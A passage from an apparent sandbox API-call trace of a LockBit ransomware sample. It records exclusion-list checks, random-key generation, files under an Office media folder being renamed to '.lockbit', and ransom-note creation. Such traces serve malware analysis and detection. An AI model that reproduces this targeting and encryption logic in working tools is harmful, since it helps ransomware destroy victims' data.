lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.408] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.408] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.409] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301252.WMF") returned 1 [0199.409] lstrcmpiW (lpString1="ntldr", lpString2="J0301252.WMF") returned 1 [0199.409] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301252.WMF") returned 1 [0199.410] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301252.WMF") returned -1 [0199.410] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301252.WMF") returned -1 [0199.410] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301252.WMF") returned 1 [0199.410] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301252.WMF") returned -1 [0199.410] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.410] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF") returned=".WMF" [0199.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.410] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.410] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.411] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.411] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF.lockbit") returned 70 [0199.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301252.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.413] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.413] malloc (_Size=0x40068) returned 0x3df0008 [0199.413] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=38202) returned 1 [0199.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.414] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.418] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.418] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.418] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.419] free (_Block=0x1fa2ed8) [0199.419] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.419] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.419] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.419] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5570900, ftCreationTime.dwHighDateTime=0x1bf4530, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5570900, ftLastWriteTime.dwHighDateTime=0x1bf4530, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301480.WMF", cAlternateFileName="")) returned 1 [0199.419] lstrcmpiW (lpString1=".", lpString2="J0301480.WMF") returned -1 [0199.419] lstrcmpiW (lpString1="..", lpString2="J0301480.WMF") returned -1 [0199.420] PathFindExtensionW (pszPath="J0301480.WMF") returned=".WMF" [0199.420] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.420] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.421] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301480.WMF") returned 1 [0199.421] lstrcmpiW (lpString1="ntldr", lpString2="J0301480.WMF") returned 1 [0199.421] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301480.WMF") returned 1 [0199.421] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301480.WMF") returned -1 [0199.421] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301480.WMF") returned -1 [0199.421] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301480.WMF") returned 1 [0199.421] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301480.WMF") returned -1 [0199.421] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.421] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF") returned=".WMF" [0199.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.421] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.422] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.422] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF.lockbit") returned 70 [0199.422] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301480.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.427] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.427] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.427] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8000) returned 1 [0199.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.428] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.429] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.429] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.431] free (_Block=0x1fa2ed8) [0199.431] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.431] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.431] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced53d00, ftCreationTime.dwHighDateTime=0x1bf4a9f, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xced53d00, ftLastWriteTime.dwHighDateTime=0x1bf4a9f, nFileSizeHigh=0x0, nFileSizeLow=0x5a2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0302827.JPG", cAlternateFileName="")) returned 1 [0199.431] lstrcmpiW (lpString1=".", lpString2="J0302827.JPG") returned -1 [0199.431] lstrcmpiW (lpString1="..", lpString2="J0302827.JPG") returned -1 [0199.431] PathFindExtensionW (pszPath="J0302827.JPG") returned=".JPG" [0199.431] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0199.431] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0199.431] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0199.431] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0199.431] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0199.432] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0199.432] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0199.433] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0199.433] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0302827.JPG") returned 1 [0199.433] lstrcmpiW (lpString1="ntldr", lpString2="J0302827.JPG") returned 1 [0199.433] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0302827.JPG") returned 1 [0199.433] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0302827.JPG") returned -1 [0199.433] lstrcmpiW (lpString1="autorun.inf", lpString2="J0302827.JPG") returned -1 [0199.433] lstrcmpiW (lpString1="thumbs.db", lpString2="J0302827.JPG") returned 1 [0199.433] lstrcmpiW (lpString1="iconcache.db", lpString2="J0302827.JPG") returned -1 [0199.433] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.433] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG") returned=".JPG" [0199.433] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0199.434] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0199.434] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0199.435] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0199.435] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG.lockbit") returned 70 [0199.435] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302827.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.436] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.436] malloc (_Size=0x40068) returned 0x3d70450 [0199.436] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=23083) returned 1 [0199.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.437] 